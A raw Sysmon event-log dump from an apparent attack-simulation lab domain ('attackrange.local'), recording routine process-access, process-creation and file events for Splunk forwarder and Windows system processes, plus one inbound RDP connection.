09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979553Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979552Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979551Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979550Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8BAE-6151-DE79-00000000FD01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979549Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.934{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BAE-6151-DE79-00000000FD01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979548Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.925{69CF5F33-8BAE-6151-DE79-00000000FD01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979547Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.918{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA98D40D11A9CDDE2700E01B867F7652,SHA256=F8AB3C9917B05DC23F1888D6C4B52ABF6537AB8848A444A231311C619057104E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979546Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.747{69CF5F33-8BAE-6151-DD79-00000000FD01}11282004C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:24.209{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53493-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:26.364{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EA669F3A9C61599D3833DB331D527F3,SHA256=43EBD6371A743D2DDE23D50271C05112B29E6444E04D2E8D0E533F0BD3D97A1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979545Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.700{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=169E8EF265536302A2A533A744814B9E,SHA256=140863874D160FB36558BC30DA7CD191419C7BAA50BCC35160AB6D877F67EC16,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979544Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BAE-6151-DD79-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979543Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979542Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979541Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979540Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979539Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979538Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979537Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979536Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979535Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979534Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8BAE-6151-DD79-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979533Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.403{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BAE-6151-DD79-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979532Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:26.388{69CF5F33-8BAE-6151-DD79-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:27.401{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=039825F3402E9FC18DCDE1DC0CF15158,SHA256=70C9F9A3A2BBF17555C8E5815F4E34CBDACC4644556324A7F55F3CD51F6624D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979574Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.762{69CF5F33-8BAF-6151-DF79-00000000FD01}1843652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979573Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BAF-6151-DF79-00000000FD01}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979572Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979571Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 